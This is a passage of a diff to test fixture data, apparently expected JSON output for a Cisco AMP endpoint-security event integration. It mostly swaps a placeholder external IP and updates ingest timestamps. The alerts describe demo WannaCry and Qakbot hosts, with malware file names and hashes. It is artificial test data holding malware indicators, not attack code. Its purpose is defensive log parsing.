Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741857\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", + "ingested": "2021-12-09T13:35:51.461671200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":178000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.ED01EBFBC9-100.SBX.TG\",\"detection_id\":\"6419214500913741857\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2835,7 +2835,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2885,7 +2885,7 @@ "e889544aff85ffaf8b0d0da705105dee7c97fe26" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2898,8 +2898,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103784832Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":163000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", + "ingested": "2021-12-09T13:35:51.461675200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":163000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-100.SBX.TG\",\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", @@ -2921,7 +2921,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -2962,7 +2962,7 @@ "24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -2972,8 +2972,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103786853Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":709000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", + "ingested": "2021-12-09T13:35:51.461679200Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214500913742000,\"timestamp\":1610631812,\"timestamp_nanoseconds\":709000000,\"date\":\"2021-01-14T13:43:32+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214500913741856\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -2993,7 +2993,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3034,7 +3034,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3044,8 +3044,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103788884Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214492323807000,\"timestamp\":1610631810,\"timestamp_nanoseconds\":447000000,\"date\":\"2021-01-14T13:43:30+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461682700Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214492323807000,\"timestamp\":1610631810,\"timestamp_nanoseconds\":447000000,\"date\":\"2021-01-14T13:43:30+00:00\",\"event_type\":\"Threat 
Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "553648143", "kind": "alert", "action": "Threat Quarantined", @@ -3065,7 +3065,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3124,7 +3124,7 @@ "5ff465afaabcbf0150d1a3ab2c2e74f3a4426467" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3141,8 +3141,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103790885Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214488028840000,\"timestamp\":1610631809,\"timestamp_nanoseconds\":916000000,\"date\":\"2021-01-14T13:43:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", + "ingested": "2021-12-09T13:35:51.461687200Z", + "original": 
"{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419214488028840000,\"timestamp\":1610631809,\"timestamp_nanoseconds\":916000000,\"date\":\"2021-01-14T13:43:29+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419214488028839966\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\",\"sha1\":\"5ff465afaabcbf0150d1a3ab2c2e74f3a4426467\",\"md5\":\"84c82835a5d21bbcf75a61706d8ab549\"},\"parent\":{\"process_id\":5580,\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"}}}}}", "code": "1090519054", "kind": "alert", "action": "Threat Detected", 
@@ -3164,7 +3164,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "parent": { @@ -3209,7 +3209,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3219,8 +3219,8 @@ }, "event": { "severity": 3, - "ingested": "2021-09-30T00:15:28.103792900Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945890085425,\"timestamp\":1610630976,\"timestamp_nanoseconds\":535214029,\"date\":\"2021-01-14T13:29:36+00:00\",\"event_type\":\"Potential Dropper Infection\",\"event_type_id\":1107296257,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610630976,\"start_date\":\"2021-01-14T13:29:36+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461693100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":14945890085425,\"timestamp\":1610630976,\"timestamp_nanoseconds\":535214029,\"date\":\"2021-01-14T13:29:36+00:00\",\"event_type\":\"Potential Dropper 
Infection\",\"event_type_id\":1107296257,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610630976,\"start_date\":\"2021-01-14T13:29:36+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "1107296257", "kind": "alert", "start": "2021-01-14T13:29:36.000Z", @@ -3242,7 +3242,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3274,7 +3274,7 @@ "Demo_Qakbot_3" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3284,8 +3284,8 @@ }, "event": { "severity": 0, - "ingested": "2021-09-30T00:15:28.103794895Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412574627503014000,\"timestamp\":1610630889,\"timestamp_nanoseconds\":341000000,\"date\":\"2021-01-14T13:28:09+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", + "ingested": "2021-12-09T13:35:51.461698100Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412574627503014000,\"timestamp\":1610630889,\"timestamp_nanoseconds\":341000000,\"date\":\"2021-01-14T13:28:09+00:00\",\"event_type\":\"Policy 
Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "code": "553648130", "kind": "alert", "action": "Policy Update", @@ -3302,7 +3302,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "connector_guid": "test_connector_guid", "related": { @@ -3338,7 +3338,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3348,8 +3348,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103796929Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":50000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", + "ingested": "2021-12-09T13:35:51.461703800Z", + "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":50000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Quarantine 
Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419204910251769881\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"81.2.69.144\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}", "code": "2164260880", "kind": "alert", "action": "Quarantine Failure", @@ -3369,7 +3369,7 @@ } ], "connector_guid": "test_connector_guid", - "external_ip": "8.8.8.8" + "external_ip": "81.2.69.144" }, "file": { "disposition": "Malicious", @@ -3419,7 +3419,7 @@ "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa" ], "ip": [ - "8.8.8.8", + "81.2.69.144", "10.10.10.10" ] }, 
@@ -3436,8 +3436,8 @@ }, "event": { "severity": 2, - "ingested": "2021-09-30T00:15:28.103798946Z", - "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419204910251770000,\"timestamp\":1610629579,\"timestamp_nanoseconds\":596000000,\"date\":\"2021-01-14T13:06:19+00:00\",\"event_type\":\"Threat 